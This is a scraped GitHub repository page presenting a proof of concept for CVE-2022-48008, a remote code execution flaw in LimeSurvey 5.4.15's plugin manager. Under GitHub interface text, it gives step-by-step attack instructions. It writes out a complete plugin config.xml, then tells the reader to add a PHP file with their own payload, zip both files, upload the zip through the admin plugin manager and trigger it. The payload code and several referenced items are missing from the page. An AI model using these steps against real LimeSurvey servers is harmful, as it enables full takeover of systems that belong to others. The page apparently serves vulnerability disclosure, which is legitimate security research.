CVE-2022-48008: GitHub - Sakura-501/LimeSurvey-5.4.15-PluginUploadtoRCE: In LimeSurvey5.4.15, it has a vulnerability in index.php/admin/pluginmanager which can lead to RCE

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

1 branch 0 tags

Code

• Use Git or checkout with SVN using the web URL.

• Open with GitHub Desktop

• Download ZIP

Latest commit

Files

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

LimeSurvey-5.4.15-PluginUploadtoRCE

In LimeSurvey-5.4.15, it has a vulnerability in index.php/admin/pluginmanager which can lead to RCE

Impact: Complete control of the system.

The directory structure of the files we need is as follows:

Here are the attack steps:

1. Create a config.xml as follows, and remember the name->exp:

   <?xml version="1.0" encoding="UTF-8"?> <config> <metadata> <name>exp</name> <type>plugin</type> <creationDate>2021-11-18</creationDate> <lastUpdate>2021-11-23</lastUpdate> <author>Denis Chenu (for Respondage)</author> <authorUrl>https://www.respondage.nl</authorUrl> <supportUrl>https://www.limesurvey.org</supportUrl> <version>0.2.1</version> <license>GNU General Public License version 3 or later</license> <description><![CDATA[Expression Script: make answer option text available; see settings for documentation and usage.]]></description> </metadata>

   <compatibility>
       <version>5.0</version>
   </compatibility>
   
   <updaters disabled="disabled">
   </updaters>
   

   </config>

2. Create a php file with the same name(exp) exp.php and fill your payload, like the following example:

3. Compress config.xml and exp.php into one compressed package like exp.zip:

4. Upload this exp.zip file in /index.php/admin/pluginmanager?sa=index :

5. Finally, when you click the plugin that uploaded, the php payload will be triggered: